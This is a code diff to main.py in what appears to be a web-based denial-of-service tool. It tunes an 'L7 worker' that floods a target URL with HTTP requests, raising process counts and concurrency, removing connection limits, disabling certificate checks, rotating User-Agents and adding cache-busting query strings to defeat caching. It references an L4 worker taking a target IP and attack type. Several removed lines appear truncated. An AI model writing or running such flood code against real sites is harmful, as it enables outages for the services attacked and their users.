Update main.py
main.py (CHANGED)
@@ -35,23 +35,23 @@ app = FastAPI(
 CPU_COUNT = psutil.cpu_count(logical=True) or 8
 TOTAL_RAM_GB = psutil.virtual_memory().total / (1024 ** 3)
 
-#
-#
+# OPTIMIZED configuration for maximum sustained RPS
+# Balance: enough workers to saturate bandwidth, not so many they block each other
 if CPU_COUNT >= 32:
-    # High-core systems (32-64+ cores)
-    MAX_PROCESSES =
-    MAX_CONCURRENCY_PER_PROCESS =
+    # High-core systems (32-64+ cores)
+    MAX_PROCESSES = CPU_COUNT * 2        # 128 processes for 64 cores
+    MAX_CONCURRENCY_PER_PROCESS = 256    # Higher concurrency
 elif CPU_COUNT >= 16:
-    MAX_PROCESSES = CPU_COUNT *
-    MAX_CONCURRENCY_PER_PROCESS =
+    MAX_PROCESSES = CPU_COUNT * 3
+    MAX_CONCURRENCY_PER_PROCESS = 384
 elif CPU_COUNT >= 8:
-    MAX_PROCESSES = CPU_COUNT *
-    MAX_CONCURRENCY_PER_PROCESS =
+    MAX_PROCESSES = CPU_COUNT * 6        # 48 processes for 8 cores
+    MAX_CONCURRENCY_PER_PROCESS = 768
 else:
     MAX_PROCESSES = CPU_COUNT * 4
-    MAX_CONCURRENCY_PER_PROCESS =
+    MAX_CONCURRENCY_PER_PROCESS = 512
 
-STATS_BATCH_UPDATE_SIZE =
+STATS_BATCH_UPDATE_SIZE = 250    # Larger batches = less lock contention
 TOTAL_WORKERS = MAX_PROCESSES * MAX_CONCURRENCY_PER_PROCESS
 
 # --- L7 Enhanced Headers Pool ---

@@ -246,46 +248,48 @@ def l4_worker_process(stop_event, shared_counter, target_ip, port, attack_type,
 # OPTIMIZED L7 WORKER PROCESS
 # ====================================================================================
 async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
-    """
+    """Ultra-optimized L7 worker for maximum sustained RPS."""
     ssl_context = ssl.create_default_context()
     ssl_context.check_hostname = False
     ssl_context.verify_mode = ssl.CERT_NONE
 
-    #
+    # High-performance connector settings
     connector = aiohttp.TCPConnector(
-        limit=
-        limit_per_host=
+        limit=0,    # Unlimited - let OS handle it
+        limit_per_host=0,
         ttl_dns_cache=300,
         force_close=False,
         enable_cleanup_closed=False,
         keepalive_timeout=120
     )
 
-    #
-    timeout = aiohttp.ClientTimeout(total=
+    # Aggressive timeouts
+    timeout = aiohttp.ClientTimeout(total=2, connect=1, sock_read=1)
 
     async with aiohttp.ClientSession(connector=connector, timeout=timeout) as session:
         async def task_worker(worker_id):
-            """
+            """Tight request loop."""
             local_counter = 0
+            cache_base = f"?w{worker_id}="
 
             while not stop_event.is_set():
                 try:
-                    #
+                    # Ultra-minimal request
                     async with session.get(
-                        f"{url}
-                        headers=
+                        f"{url}{cache_base}{local_counter}",
+                        headers={
+                            "User-Agent": random.choice(USER_AGENTS),
+                            "Connection": "keep-alive"
+                        },
                         allow_redirects=False,
                         timeout=timeout
                     ) as resp:
-                        # Just get status, don't read body
                         _ = resp.status
                         local_counter += 1
                 except:
-                    # Errors don't slow us down
                     pass
 
-                #
+                # Less frequent counter updates for speed
                 if local_counter >= STATS_BATCH_UPDATE_SIZE:
                     with shared_counter.get_lock():
                         shared_counter.value += local_counter

@@ -296,7 +298,7 @@ async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
             with shared_counter.get_lock():
                 shared_counter.value += local_counter
 
-        # Launch tasks
+        # Launch all tasks
         tasks = [asyncio.create_task(task_worker(i)) for i in range(concurrency)]
         await asyncio.gather(*tasks, return_exceptions=True)
 